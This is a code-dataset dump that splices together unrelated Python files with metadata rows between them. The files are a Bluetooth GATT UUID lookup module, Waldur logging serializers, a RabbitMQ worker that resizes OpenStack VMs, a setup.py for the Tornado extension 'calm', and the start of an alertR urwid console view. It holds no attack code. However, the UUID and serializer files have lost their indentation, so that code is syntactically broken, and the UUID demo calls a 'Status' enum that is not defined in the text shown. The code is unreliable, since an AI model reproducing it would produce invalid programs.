    # 0x2a1a and 0x2a1b undefined
0x2a1c: "Temperature Measurement",
0x2a1d: "Temperature Type",
0x2a1e: "Intermediate Temperature",
    # 0x2a1f and 0x2a20 undefined
0x2a21: "Measurement Interval",
0x2a22: "Boot Keyboard Input Report",
0x2a23: "System ID",
0x2a24: "Model Number String",
0x2a25: "Serial Number String",
0x2a26: "Firmware Revision String",
0x2a27: "Hardware Revision String",
0x2a28: "Software Revision String",
0x2a29: "Manufacturer Name String",
0x2a2a: "IEEE 11073-20601 Regulatory Cert. Data List",
0x2a2b: "Current Time",
0x2a2c: "Magnetic Declination",
    # 0x2a2d to 0x2a30 undefined
0x2a31: "Scan Refresh",
0x2a32: "Boot Keyboard Output Report",
0x2a33: "Boot Mouse Input Report",
0x2a34: "Glucose Measurement Context",
0x2a35: "Blood Pressure Measurement",
0x2a36: "Intermediate Cuff Pressure",
0x2a37: "Heart Rate Measurement",
0x2a38: "Body Sensor Location",
0x2a39: "Heart Rate Control Point",
    # 0x2a3a to 0x2a3e undefined
0x2a3f: "Alert Status",
0x2a40: "Ringer Control Point",
0x2a41: "Ringer Setting",
0x2a42: "Alert Category ID Bit Mask",
0x2a43: "Alert Category ID",
0x2a44: "Alert Notification Control Point",
0x2a45: "Unread Alert Status",
0x2a46: "New Alert",
0x2a47: "Supported New Alert Category",
0x2a48: "Supported Unread Alert Category",
0x2a49: "Blood Pressure Feature",
0x2a4a: "HID Information",
0x2a4b: "Report Map",
0x2a4c: "HID Control Point",
0x2a4d: "Report",
0x2a4e: "Protocol Mode",
0x2a4f: "Scan Interval Window",
0x2a50: "PnP ID",
0x2a51: "Glucose Feature",
0x2a52: "Record Access Control Point",
0x2a53: "RSC Measurement",
0x2a54: "RSC Feature",
0x2a55: "SC Control Point",
0x2a56: "Digital",
    # 0x2a57 undefined
0x2a58: "Analog",
    # 0x2a59 undefined
0x2a5a: "Aggregate",
0x2a5b: "CSC Measurement",
0x2a5c: "CSC Feature",
0x2a5d: "Sensor Location",
    # 0x2a5e to 0x2a62 undefined
0x2a63: "Cycling Power Measurement",
0x2a64: "Cycling Power Vector",
0x2a65: "Cycling Power Feature",
0x2a66: "Cycling Power Control Point",
0x2a67: "Location and Speed",
0x2a68: "Navigation",
0x2a69: "Position Quality",
0x2a6a: "LN Feature",
0x2a6b: "LN Control Point",
0x2a6c: "Elevation",
0x2a6d: "Pressure",
0x2a6e: "Temperature",
0x2a6f: "Humidity",
0x2a70: "True Wind Speed",
0x2a71: "True Wind Direction",
0x2a72: "Apparent Wind Speed",
0x2a73: "Apparent Wind Direction",
0x2a74: "Gust Factor",
0x2a75: "Pollen Concentration",
0x2a76: "UV Index",
0x2a77: "Irradiance",
0x2a78: "Rainfall",
0x2a79: "Wind Chill",
0x2a7a: "Heat Index",
0x2a7b: "Dew Point",
0x2a7c: "Trend",
0x2a7d: "Descriptor Value Changed",
0x2a7e: "Aerobic Heart Rate Lower Limit",
0x2a7f: "Aerobic Threshold",
0x2a80: "Age",
0x2a81: "Anaerobic Heart Rate Lower Limit",
0x2a82: "Anaerobic Heart Rate Upper Limit",
0x2a83: "Anaerobic Threshold",
0x2a84: "Aerobic Heart Rate Upper Limit",
0x2a85: "Date of Birth",
0x2a86: "Date of Threshold Assessment",
0x2a87: "Email Address",
0x2a88: "Fat Burn Heart Rate Lower Limit",
0x2a89: "Fat Burn Heart Rate Upper Limit",
0x2a8a: "First Name",
0x2a8b: "Five Zone Heart Rate Limits",
0x2a8c: "Gender",
0x2a8d: "Heart Rate Max",
0x2a8e: "Height",
0x2a8f: "Hip Circumference",
0x2a90: "Last Name",
0x2a91: "Maximum Recommended Heart Rate",
0x2a92: "Resting Heart Rate",
0x2a93: "Sport Type for Aerobic/Anaerobic Thresholds",
0x2a94: "Three Zone Heart Rate Limits",
0x2a95: "Two Zone Heart Rate Limit",
0x2a96: "VO2 Max",
0x2a97: "Waist Circumference",
0x2a98: "Weight",
0x2a99: "Database Change Increment",
0x2a9a: "User Index",
0x2a9b: "Body Composition Feature",
0x2a9c: "Body Composition Measurement",
0x2a9d: "Weight Measurement",
0x2a9e: "Weight Scale Feature",
0x2a9f: "User Control Point",
0x2aa0: "Magnetic Flux Density - 2D",
0x2aa1: "Magnetic Flux Density - 3D",
0x2aa2: "Language",
0x2aa3: "Barometric Pressure Trend",
0x2aa4: "Bond Management Control Point",
0x2aa5: "Bond Management Feature",
0x2aa6: "Central Address Resolution",
0x2aa7: "CGM Measurement",
0x2aa8: "CGM Feature",
0x2aa9: "CGM Status",
0x2aaa: "CGM Session Start Time",
0x2aab: "CGM Session Run Time",
0x2aac: "CGM Specific Ops Control Point",
0x2aad: "Indoor Positioning Configuration",
0x2aae: "Latitude",
0x2aaf: "Longitude",
0x2ab0: "Local North Coordinate",
0x2ab1: "Local East Coordinate",
0x2ab2: "Floor Number",
0x2ab3: "Altitude",
0x2ab4: "Uncertainty",
0x2ab5: "Location Name",
0x2ab6: "URI",
0x2ab7: "HTTP Headers",
0x2ab8: "HTTP Status Code",
0x2ab9: "HTTP Entity Body",
0x2aba: "HTTP Control Point",
0x2abb: "HTTPS Security",
0x2abc: "TDS Control Point",
0x2abd: "OTS Feature",
0x2abe: "Object Name",
0x2abf: "Object Type",
0x2ac0: "Object Size",
0x2ac1: "Object First-Created",
0x2ac2: "Object Last-Modified",
0x2ac3: "Object ID",
0x2ac4: "Object Properties",
0x2ac5: "Object Action Control Point",
0x2ac6: "Object List Control Point",
0x2ac7: "Object List Filter",
0x2ac8: "Object Changed",
    # vendor defined
0xfeff: "GN Netcom",
0xfefe: "GN ReSound A/S",
0xfefd: "Gimbal, Inc.",
0xfefc: "Gimbal, Inc.",
0xfefb: "Stollmann E+V GmbH",
0xfefa: "PayPal, Inc.",
0xfef9: "PayPal, Inc.",
0xfef8: "Aplix Corporation",
0xfef7: "Aplix Corporation",
0xfef6: "Wicentric, Inc.",
0xfef5: "Dialog Semiconductor GmbH",
0xfef4: "Google",
0xfef3: "Google",
0xfef2: "CSR",
0xfef1: "CSR",
0xfef0: "Intel",
0xfeef: "Polar Electro Oy",
0xfeee: "Polar Electro Oy",
0xfeed: "Tile, Inc.",
0xfeec: "Tile, Inc.",
0xfeeb: "Swirl Networks, Inc.",
0xfeea: "Swirl Networks, Inc.",
0xfee9: "Quintic Corp.",
0xfee8: "Quintic Corp.",
0xfee7: "Tencent Holdings Limited",
0xfee6: "Seed Labs, Inc.",
0xfee5: "Nordic Semiconductor ASA",
0xfee4: "Nordic Semiconductor ASA",
0xfee3: "Anki, Inc.",
0xfee2: "Anki, Inc.",
0xfee1: "Anhui Huami Information Technology Co.",
0xfee0: "Anhui Huami Information Technology Co.",
0xfedf: "Design SHIFT",
0xfede: "Coin, Inc.",
0xfedd: "Jawbone",
0xfedc: "Jawbone",
0xfedb: "Perka, Inc.",
0xfeda: "ISSC Technologies Corporation",
0xfed9: "Pebble Technology Corporation",
0xfed8: "Google",
0xfed7: "Broadcom Corporation",
0xfed6: "Broadcom Corporation",
0xfed5: "Plantronics Inc.",
0xfed4: "Apple, Inc.",
0xfed3: "Apple, Inc.",
0xfed2: "Apple, Inc.",
0xfed1: "Apple, Inc.",
0xfed0: "Apple, Inc.",
0xfecf: "Apple, Inc.",
0xfece: "Apple, Inc.",
0xfecd: "Apple, Inc.",
0xfecc: "Apple, Inc.",
0xfecb: "Apple, Inc.",
0xfeca: "Apple, Inc.",
0xfec9: "Apple, Inc.",
0xfec8: "Apple, Inc.",
0xfec7: "Apple, Inc.",
0xfec6: "Kocomojo, LLC",
0xfec5: "Realtek Semiconductor Corp.",
0xfec4: "PLUS Location Systems",
0xfec3: "360fly, Inc.",
0xfec2: "Blue Spark Technologies, Inc.",
0xfec1: "KDDI Corporation",
0xfec0: "KDDI Corporation",
0xfebf: "Nod, Inc.",
0xfebe: "Bose Corporation",
0xfebd: "Clover Network, Inc.",
0xfebc: "Dexcom, Inc.",
0xfebb: "adafruit industries",
0xfeba: "Tencent Holdings Limited",
0xfeb9: "LG Electronics",
0xfeb8: "Facebook, Inc.",
0xfeb7: "Facebook, Inc.",
0xfeb6: "Vencer Co, Ltd",
0xfeb5: "WiSilica Inc.",
0xfeb4: "WiSilica Inc.",
0xfeb3: "Taobao",
0xfeb2: "Microsoft Corporation",
0xfeb1: "Electronics Tomorrow Limited",
0xfeb0: "Nest Labs Inc.",
0xfeaf: "Nest Labs Inc.",
0xfeae: "Nokia Corporation",
0xfead: "Nokia Corporation",
0xfeac: "Nokia Corporation",
0xfeab: "Nokia Corporation",
0xfeaa: "Google",
0xfea9: "Savant Systems LLC",
0xfea8: "Savant Systems LLC",
0xfea7: "UTC Fire and Security",
0xfea6: "GoPro, Inc.",
0xfea5: "GoPro, Inc.",
0xfea4: "Paxton Access Ltd",
0xfea3: "ITT Industries",
0xfea2: "Intrepid Control Systems, Inc.",
0xfea1: "Intrepid Control Systems, Inc.",
0xfea0: "Google",
0xfe9f: "Google",
0xfe9e: "Dialog Semiconductor B.V.",
0xfe9d: "Mobiquity Networks Inc",
0xfe9c: "GSI Laboratories, Inc.",
0xfe9b: "Samsara Networks, Inc",
0xfe9a: "Estimote",
0xfe99: "Currant, Inc.",
0xfe98: "Currant, Inc.",
0xfe97: "Tesla Motor Inc.",
0xfe96: "Tesla Motor Inc.",
0xfe95: "Xiaomi Inc.",
0xfe94: "OttoQ Inc.",
0xfe93: "OttoQ Inc.",
0xfe92: "Jarden Safety & Security",
0xfe91: "Shanghai Imilab Technology Co.,Ltd",
0xfe90: "JUMA",
0xfe8f: "CSR",
0xfe8e: "ARM Ltd",
0xfe8d: "Interaxon Inc.",
0xfe8c: "TRON Forum",
0xfe8b: "Apple, Inc.",
0xfe8a: "Apple, Inc.",
0xfe89: "B&O Play A/S",
0xfe88: "SALTO SYSTEMS S.L.",
0xfe87: "Qingdao Yeelink Information Technology Co., Ltd. ( 青岛亿联客信息技术有限公司 )",
0xfe86: "HUAWEI Technologies Co., Ltd. ( 华为技术有限公司 )",
0xfe85: "RF Digital Corp",
0xfe84: "RF Digital Corp",
0xfe83: "Blue Bite",
0xfe82: "Medtronic Inc.",
0xfe81: "Medtronic Inc.",
0xfe80: "Doppler Lab",
0xfe7f: "Doppler Lab",
0xfe7e: "Awear Solutions Ltd",
0xfe7d: "Aterica Health Inc.",
0xfe7c: "Stollmann E+V GmbH",
0xfe7b: "Orion Labs, Inc.",
0xfe7a: "Bragi GmbH",
0xfe79: "Zebra Technologies",
0xfe78: "Hewlett-Packard Company",
0xfe77: "Hewlett-Packard Company",
0xfe76: "TangoMe",
0xfe75: "TangoMe",
0xfe74: "unwire",
0xfe73: "St. Jude Medical, Inc.",
0xfe72: "St. Jude Medical, Inc.",
0xfe71: "Plume Design Inc",
0xfe70: "Beijing Jingdong Century Trading Co., Ltd.",
0xfe6f: "LINE Corporation",
0xfe6e: "The University of Tokyo",
0xfe6d: "The University of Tokyo",
0xfe6c: "TASER International, Inc.",
0xfe6b: "TASER International, Inc.",
0xfe6a: "Kontakt Micro-Location Sp. z o.o.",
0xfe69: "Qualcomm Life Inc",
0xfe68: "Qualcomm Life Inc",
0xfe67: "Lab Sensor Solutions",
0xfe66: "Intel Corporation",
    # SDO defined
0xfffe: "Alliance for Wireless Power (A4WP)",
0xfffd: "Fast IDentity Online Alliance (FIDO)",
}
ALL_128BIT_UUIDS = {
"a3c87500-8ed3-4bdf-8a39-a01bebede295": "Eddystone Configuration Service",
"a3c87501-8ed3-4bdf-8a39-a01bebede295": "Capabilities",
"a3c87502-8ed3-4bdf-8a39-a01bebede295": "Active Slot",
"a3c87503-8ed3-4bdf-8a39-a01bebede295": "Advertising Interval",
"a3c87504-8ed3-4bdf-8a39-a01bebede295": "Radio Tx Power",
"a3c87505-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Advertised Tx Power",
"a3c87506-8ed3-4bdf-8a39-a01bebede295": "Lock State",
"a3c87507-8ed3-4bdf-8a39-a01bebede295": "Unlock",
"a3c87508-8ed3-4bdf-8a39-a01bebede295": "Public ECDH Key",
"a3c87509-8ed3-4bdf-8a39-a01bebede295": "EID Identity Key",
"a3c8750a-8ed3-4bdf-8a39-a01bebede295": "ADV Slot Data",
"a3c8750b-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Factory reset",
"a3c8750c-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Remain Connectable",
    # BBC micro:bit Bluetooth Profiles
"e95d0753-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Service",
"e95dca4b-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Data",
"e95dfb24-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Period",
"e95df2d8-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Service",
"e95dfb11-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Data",
"e95d386c-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Period",
"e95d9715-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Bearing",
"e95d9882-251d-470a-a062-fa1922dfa9a8": "MicroBit Button Service",
"e95dda90-251d-470a-a062-fa1922dfa9a8": "MicroBit Button A State",
"e95dda91-251d-470a-a062-fa1922dfa9a8": "MicroBit Button B State",
"e95d127b-251d-470a-a062-fa1922dfa9a8": "MicroBit IO PIN Service",
"e95d8d00-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN Data",
"e95d5899-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN AD Configuration",
"e95dd822-251d-470a-a062-fa1922dfa9a8": "MicroBit PWM Control",
"e95dd91d-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Service",
"e95d7b77-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Matrix state",
"e95d93ee-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Text",
"e95d0d2d-251d-470a-a062-fa1922dfa9a8": "MicroBit Scrolling Delay",
"e95d93af-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Service",
"e95db84c-251d-470a-a062-fa1922dfa9a8": "MicroBit Requirements",
"e95d9775-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Data",
"e95d23c4-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Requirements",
"e95d5404-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Events",
"e95d93b0-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control Service",
"e95d93b1-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control",
"e95d6100-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Service",
"e95d1b25-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Period",
    # Nordic UART Port Emulation
"6e400001-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART Service",
"6e400002-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART TX",
"6e400003-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART RX",
}
def uuid_to_string(uuid):
"""
For a given UUID string, try to determine the textual equivalent
of the GATT service or characteristic.
"""
if not isinstance(uuid, str):
raise TypeError("Expected a UUID string.")
if len(uuid) != 36:
raise ValueError("Expected the UUID string to be 36 characters long.")
uuid_text = ALL_128BIT_UUIDS.get(uuid, None)
if uuid_text is not None:
return uuid_text
else:
if uuid.endswith("-0000-1000-8000-00805f9b34fb"):
uuid_service = int(uuid[:8], 16)
return ALL_16BIT_UUIDS.get(uuid_service, None)
else:
return None
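# Illustrative demo (not part of the original module): resolve a few
# well-known identifiers using the tables and enums defined above.
if __name__ == "__main__":
    # A 16-bit service UUID expanded to the Bluetooth base UUID form.
    print(uuid_to_string("0000180d-0000-1000-8000-00805f9b34fb"))  # Heart Rate
    # A 128-bit vendor-specific UUID, looked up directly.
    print(uuid_to_string("6e400001-b5a3-f393-e0a9-e50e24dcca9e"))  # Nordic UART Service
    # A raw HCI status byte mapped to a readable name.
    print(Status(0x0c).name)  # CommandDisallowed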
|
mit
| 6,484,401,005,254,201,000
| 30.06422
| 81
| 0.698386
| false
| 2.615749
| false
| false
| false
|
opennode/nodeconductor
|
waldur_core/logging/serializers.py
|
1
|
5531
|
from django.db import IntegrityError
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from waldur_core.core.fields import MappedChoiceField, NaturalChoiceField
from waldur_core.core.serializers import GenericRelatedField
from waldur_core.logging import models, utils, loggers
class AlertSerializer(serializers.HyperlinkedModelSerializer):
scope = GenericRelatedField(related_models=utils.get_loggable_models())
severity = MappedChoiceField(
choices=[(v, k) for k, v in models.Alert.SeverityChoices.CHOICES],
choice_mappings={v: k for k, v in models.Alert.SeverityChoices.CHOICES},
)
context = serializers.JSONField(read_only=True)
class Meta(object):
model = models.Alert
fields = (
'url', 'uuid', 'alert_type', 'message', 'severity', 'scope',
'created', 'closed', 'context', 'acknowledged',
)
read_only_fields = ('uuid', 'created', 'closed')
extra_kwargs = {
'url': {'lookup_field': 'uuid'},
}
def create(self, validated_data):
try:
alert, created = loggers.AlertLogger().process(
severity=validated_data['severity'],
message_template=validated_data['message'],
scope=validated_data['scope'],
alert_type=validated_data['alert_type'],
)
except IntegrityError:
# In case of simultaneous requests serializer validation can pass for both alerts,
# so we need to handle DB IntegrityError separately.
raise serializers.ValidationError(_('Alert with given type and scope already exists.'))
else:
return alert
class EventSerializer(serializers.Serializer):
level = serializers.ChoiceField(choices=['debug', 'info', 'warning', 'error'])
message = serializers.CharField()
scope = GenericRelatedField(related_models=utils.get_loggable_models(), required=False)
class BaseHookSerializer(serializers.HyperlinkedModelSerializer):
author_uuid = serializers.ReadOnlyField(source='user.uuid')
hook_type = serializers.SerializerMethodField()
class Meta(object):
model = models.BaseHook
fields = (
'url', 'uuid', 'is_active', 'author_uuid',
'event_types', 'event_groups', 'created', 'modified',
'hook_type'
)
extra_kwargs = {
'url': {'lookup_field': 'uuid'},
}
def get_fields(self):
"""
When static declaration is used, event type choices are fetched too early -
even before all apps are initialized. As a result, some event types are missing.
When dynamic declaration is used, all valid event types are available as choices.
"""
fields = super(BaseHookSerializer, self).get_fields()
fields['event_types'] = serializers.MultipleChoiceField(
choices=loggers.get_valid_events(), required=False)
fields['event_groups'] = serializers.MultipleChoiceField(
choices=loggers.get_event_groups_keys(), required=False)
return fields
def create(self, validated_data):
validated_data['user'] = self.context['request'].user
return super(BaseHookSerializer, self).create(validated_data)
def validate(self, attrs):
if not self.instance and 'event_types' not in attrs and 'event_groups' not in attrs:
raise serializers.ValidationError(_('Please specify list of event_types or event_groups.'))
if 'event_groups' in attrs:
events = list(attrs.get('event_types', []))
groups = list(attrs.get('event_groups', []))
events = sorted(set(loggers.expand_event_groups(groups)) | set(events))
attrs['event_types'] = events
attrs['event_groups'] = groups
elif 'event_types' in attrs:
attrs['event_types'] = list(attrs['event_types'])
return attrs
def get_hook_type(self, hook):
raise NotImplementedError
class SummaryHookSerializer(serializers.Serializer):
def to_representation(self, instance):
serializer = self.get_hook_serializer(instance.__class__)
return serializer(instance, context=self.context).data
def get_hook_serializer(self, cls):
for serializer in BaseHookSerializer.__subclasses__():
if serializer.Meta.model == cls:
return serializer
        raise ValueError('No hook serializer found for class %s' % cls)
class WebHookSerializer(BaseHookSerializer):
content_type = NaturalChoiceField(models.WebHook.ContentTypeChoices.CHOICES, required=False)
class Meta(BaseHookSerializer.Meta):
model = models.WebHook
fields = BaseHookSerializer.Meta.fields + ('destination_url', 'content_type')
def get_hook_type(self, hook):
return 'webhook'
class PushHookSerializer(BaseHookSerializer):
type = NaturalChoiceField(models.PushHook.Type.CHOICES)
class Meta(BaseHookSerializer.Meta):
model = models.PushHook
fields = BaseHookSerializer.Meta.fields + ('type', 'device_id', 'token', 'device_manufacturer', 'device_model')
def get_hook_type(self, hook):
return 'pushhook'
class EmailHookSerializer(BaseHookSerializer):
class Meta(BaseHookSerializer.Meta):
model = models.EmailHook
fields = BaseHookSerializer.Meta.fields + ('email', )
def get_hook_type(self, hook):
return 'email'
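# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the merge performed
# in BaseHookSerializer.validate() combines explicit event types with the
# expansion of event groups. With a stand-in for loggers.expand_event_groups
# (the mapping below is hypothetical), the semantics look like this:
#
#     def expand_event_groups(groups):
#         mapping = {'resources': ['resource_created', 'resource_deleted']}
#         return [event for group in groups for event in mapping.get(group, [])]
#
#     events = ['user_activated']
#     groups = ['resources']
#     merged = sorted(set(expand_event_groups(groups)) | set(events))
#     # merged == ['resource_created', 'resource_deleted', 'user_activated']
# ---------------------------------------------------------------------------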
|
mit
| 1,335,064,343,548,479,000
| 36.371622
| 119
| 0.654131
| false
| 4.36543
| false
| false
| false
|
omermahgoub/MigTool
|
Process/ResizeWorker.py
|
1
|
4412
|
#!/usr/bin/env python
__author__ = 'OmerMahgoub'
import time
import ast
import random
import pika
from common.VM import OpenStackAdapterVMInstance
from settings import settings
objSettings = settings.StackSettings()
# The below settings are coming from settings/setting.py which in return getting all the configurations from config.yml file
# Start of Settings Configuration
stackSettings = objSettings.ServiceSettings("OpenStack")
queueHostSettings = objSettings.ServiceSettings("rabbitMQ")
queueSettings = objSettings.ServiceSettings("QueueSettings")
# End of Settings Configuration
# Connection Initialization for RabbitMQ Server
count = queueSettings['retryCount']
connection = pika.BlockingConnection(pika.ConnectionParameters(
host=queueHostSettings["host"]))
channel = connection.channel()
# User Queue Declaration
channel.queue_declare(queue=queueSettings['ResizeQueueName'], durable=True)
print ' [*] Waiting for messages. To exit press CTRL+C'
# Notification_Queue accepts a message from the resize queue and forwards it to the notification queue (currently a stub)
def Notification_Queue(UserMsg):
pass
# The callback method processes each message in the queue. It is invoked whenever a new message arrives
def callback(ch, method, properties, body):
print " [x] Received %r" % (body,)
time.sleep(5)
    # Split the body into separate items
strMessage = ast.literal_eval(body)
bodyMessage = strMessage['body']
planMessage = strMessage['PlanDetails']['ItemDetails']
itemsList = bodyMessage.split(",")
orderId = itemsList[0]
userid = itemsList[1]
email = itemsList[2]
planname = itemsList[3]
projectname = itemsList[4]
requestType = itemsList[5]
serverId = itemsList[6]
objStack = OpenStackAdapterVMInstance()
# def VMQueue(self, VmName, ImageName, FlavorName, ProjectName):
msg = objStack.ResizeInstance(ServerId = serverId, FlavorName = planMessage['Flavor'], ProjectName = projectname)
print "VM Resize Status (True/False) %s" % msg
    # First get the retry count from the message headers
print "Retry Count: %s" % properties.headers["retry_count"]
if properties.headers["retry_count"] > count:
print("Saving in DB")
ch.basic_ack(delivery_tag=method.delivery_tag)
else:
try:
if msg['Status'] == False or msg['Status'] == "Error":
raise Exception("VM can't be created due to some reasons.Re-Queuing the Message again")
else:
ch.basic_ack(delivery_tag=method.delivery_tag)
print "Successfully Operated and removed from Queue"
# Throw the Project Creation Message to User Queue
Notification_Queue(body)
# End of Throwing Message to Project Queue
        except Exception:
print "Just Reached Exception Area"
print "Before setting header, Count was %s" % properties.headers["retry_count"]
# Setting the Header and incrementing to 1
headers = { # example how headers can be used
'retry_count': properties.headers["retry_count"] + 1
}
# Creating the message in the Queue Again
channel.basic_publish(
exchange='',
routing_key=queueSettings['ResizeQueueName'],
body=body, # must be string
properties=pika.BasicProperties(
delivery_mode=2, # makes persistent job
priority=0, # default priority
# timestamp=timestamp, # timestamp of job creation
# expiration=str(expire), # job expiration (milliseconds from now), must be string, handled by rabbitmq
headers=headers
))
            # Acknowledge the original message now that a retry copy has been re-published to the queue
channel.basic_ack(delivery_tag=method.delivery_tag)
print "Queue Acknowledged and removed"
print "[++++++Done+++++]"
print
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback, queue=queueSettings['ResizeQueueName'])
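# Illustrative sketch: callback() reads properties.headers["retry_count"], so
# whichever producer enqueues the first resize job must set that header. The
# helper below is hypothetical and not part of this worker:
def publish_resize_job(message_body):
    # message_body is the comma-separated order string callback() expects
    channel.basic_publish(
        exchange='',
        routing_key=queueSettings['ResizeQueueName'],
        body=message_body,
        properties=pika.BasicProperties(
            delivery_mode=2,             # persistent job
            headers={'retry_count': 0},  # required by callback()
        ))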
try:
channel.start_consuming()
except KeyboardInterrupt:
    channel.stop_consuming()
connection.close()
|
gpl-3.0
| 1,589,770,511,240,852,000
| 35.092437
| 124
| 0.644379
| false
| 4.296008
| false
| false
| false
|
n9code/calm
|
setup.py
|
1
|
1439
|
from os import path
import codecs
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with codecs.open(path.join(here, 'requirements.txt'),
encoding='utf-8') as reqs:
requirements = reqs.read()
setup(
name='calm',
version='0.1.4',
description='It is always Calm before a Tornado!',
long_description="""
Calm is an extension to Tornado Framework for building RESTful APIs.
Navigate to http://calm.n9co.de for more information.
""",
url='http://calm.n9co.de',
author='Bagrat Aznauryan',
author_email='bagrat@aznauryan.org',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: HTTP Servers',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Application Frameworks',
],
keywords='tornado rest restful api framework',
packages=find_packages(exclude=['docs', 'tests']),
install_requires=requirements,
)
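# Illustrative note: the call above passes the raw requirements.txt text to
# install_requires, relying on setuptools accepting a newline-delimited
# string. An explicit list is the more common form, e.g.:
#
#     requirements = reqs.read().splitlines()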
|
mit
| -1,791,420,317,329,591,000
| 25.648148
| 79
| 0.624044
| false
| 4.18314
| false
| false
| false
|
sqall01/alertR
|
managerClientConsole/lib/manager/elementAlertLevel.py
|
1
|
14639
|
#!/usr/bin/env python3
# written by sqall
# twitter: https://twitter.com/sqall01
# blog: https://h4des.org
# github: https://github.com/sqall01
#
# Licensed under the GNU Affero General Public License, version 3.
import time
import urwid
from typing import List
from ..globalData import ManagerObjSensor, ManagerObjAlert, ManagerObjAlertLevel, ManagerObjProfile, SensorDataType
# this class is an urwid object for an alert level
class AlertLevelUrwid:
def __init__(self, alertLevel: ManagerObjAlertLevel):
# store reference to alert level object
self.alertLevel = alertLevel
# store reference in alert level object to
# this urwid alert level object
self.alertLevel.internal_data["urwid"] = self
alertLevelPileList = list()
self.nameWidget = urwid.Text("Name: " + self.alertLevel.name)
alertLevelPileList.append(self.nameWidget)
alertLevelPile = urwid.Pile(alertLevelPileList)
alertLevelBox = urwid.LineBox(alertLevelPile, title="Level: %d" % self.alertLevel.level)
paddedAlertLevelBox = urwid.Padding(alertLevelBox, left=1, right=1)
# set the color of the urwid object
self.alertLevelUrwidMap = urwid.AttrMap(paddedAlertLevelBox, "greenColor")
self.alertLevelUrwidMap.set_focus_map({None: "greenColor_focus"})
# this function returns the final urwid widget that is used
# to render the box of an alert level
def get(self) -> urwid.AttrMap:
return self.alertLevelUrwidMap
    # this function updates the name shown for the object
def updateName(self, name: str):
self.nameWidget.set_text("Name: " + name)
# this function changes the color of this urwid object to red
def turnRed(self):
self.alertLevelUrwidMap.set_attr_map({None: "redColor"})
self.alertLevelUrwidMap.set_focus_map({None: "redColor_focus"})
# this function changes the color of this urwid object to green
def turnGreen(self):
self.alertLevelUrwidMap.set_attr_map({None: "greenColor"})
self.alertLevelUrwidMap.set_focus_map({None: "greenColor_focus"})
# this function changes the color of this urwid object to gray
def turnGray(self):
self.alertLevelUrwidMap.set_attr_map({None: "grayColor"})
self.alertLevelUrwidMap.set_focus_map({None: "grayColor_focus"})
# this function changes the color of this urwid object to the
# neutral color scheme
def turnNeutral(self):
self.alertLevelUrwidMap.set_attr_map({None: "neutral"})
# this function updates all internal widgets and checks if
# the alert level still exists
def updateCompleteWidget(self):
# check if alert level still exists
if self.alertLevel.is_deleted():
# return false if object no longer exists
return False
self.turnGreen()
self.updateName(self.alertLevel.name)
# return true if object was updated
return True
    # this function sets the color when the connection to the server has failed.
def setConnectionFail(self):
self.alertLevelUrwidMap.set_attr_map({None: "connectionfail"})
self.alertLevelUrwidMap.set_focus_map({None: "connectionfail_focus"})
# this class is an urwid object for a detailed alert level output
class AlertLevelDetailedUrwid:
def __init__(self,
alertLevel: ManagerObjAlertLevel,
sensors: List[ManagerObjSensor],
alerts: List[ManagerObjAlert],
profiles: List[ManagerObjProfile]):
self.alertLevel = alertLevel
content = list()
content.append(urwid.Divider("="))
content.append(urwid.Text("Alert Level"))
content.append(urwid.Divider("="))
temp = self._createAlertLevelWidgetList(alertLevel)
self.alertLevelPileWidget = urwid.Pile(temp)
content.append(self.alertLevelPileWidget)
content.append(urwid.Divider())
content.append(urwid.Divider("="))
content.append(urwid.Text("Profiles"))
content.append(urwid.Divider("="))
temp = self._create_profiles_widget_list(profiles)
self._profiles_pile_widget = urwid.Pile(temp)
content.append(self._profiles_pile_widget)
content.append(urwid.Divider())
content.append(urwid.Divider("="))
content.append(urwid.Text("Alerts"))
content.append(urwid.Divider("="))
temp = self._createAlertsWidgetList(alerts)
self.alertsPileWidget = urwid.Pile(temp)
content.append(self.alertsPileWidget)
content.append(urwid.Divider())
content.append(urwid.Divider("="))
content.append(urwid.Text("Sensors"))
content.append(urwid.Divider("="))
temp = self._createSensorsWidgetList(sensors)
self.sensorsPileWidget = urwid.Pile(temp)
content.append(self.sensorsPileWidget)
# use ListBox here because it handles all the
# scrolling part automatically
detailedList = urwid.ListBox(urwid.SimpleListWalker(content))
detailedFrame = urwid.Frame(detailedList, footer=urwid.Text("Keys: ESC - Back, Up/Down - Scrolling"))
self.detailedBox = urwid.LineBox(detailedFrame, title="Alert Level: " + self.alertLevel.name)
    # this function creates the detailed output of an alert level object
# in a list
def _createAlertLevelWidgetList(self, alertLevel: ManagerObjAlertLevel) -> List[urwid.Widget]:
